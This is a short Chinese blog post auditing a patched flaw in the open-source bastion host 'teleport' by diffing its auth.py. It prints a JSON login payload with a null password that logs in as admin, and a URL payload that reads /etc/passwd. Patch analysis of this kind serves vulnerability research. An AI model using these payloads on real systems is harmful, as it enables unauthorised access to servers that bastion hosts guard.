开源堡垒机teleport任意用户登录漏洞审计

admin 2023年6月6日01:10:24评论18 views字数 622阅读2分4秒阅读模式


声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0X00 任意用户登录分析


拿到更新包进行对比首先更新包更新了两个文件

开源堡垒机teleport任意用户登录漏洞审计

对比auth.py

开源堡垒机teleport任意用户登录漏洞审计两个地方。一个是elif 改成了if 然后是检测了密码是否存在。那么跟进去代码看看login 的逻辑开源堡垒机teleport任意用户登录漏洞审计只要password 为None 那么就可以跳过密码验证。让password 为None 就直接用 json.dumps开源堡垒机teleport任意用户登录漏洞审计pyaload 如下:

{
"type":2,
"username":"admin",
"password":null,
"captcha":"rhcl",
"oath":"",
"remember":false
}


0X01 任意文件读取

开源堡垒机teleport任意用户登录漏洞审计

payload如下:

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

作者:print("")

原文地址:https://www.o2oxy.cn/4132.html

关 注 有 礼



关注本公众号回复“718619
可以免费领取全套网络安全学习教程,安全靶场、面试指南、安全沙龙PPT、代码安全、火眼安全系统等

开源堡垒机teleport任意用户登录漏洞审计 还在等什么?赶紧点击下方名片关注学习吧!



原文始发于微信公众号(渗透测试网络安全):开源堡垒机teleport任意用户登录漏洞审计

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月6日01:10:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   开源堡垒机teleport任意用户登录漏洞审计https://cn-sec.com/archives/1678638.html

发表评论

匿名网友 填写信息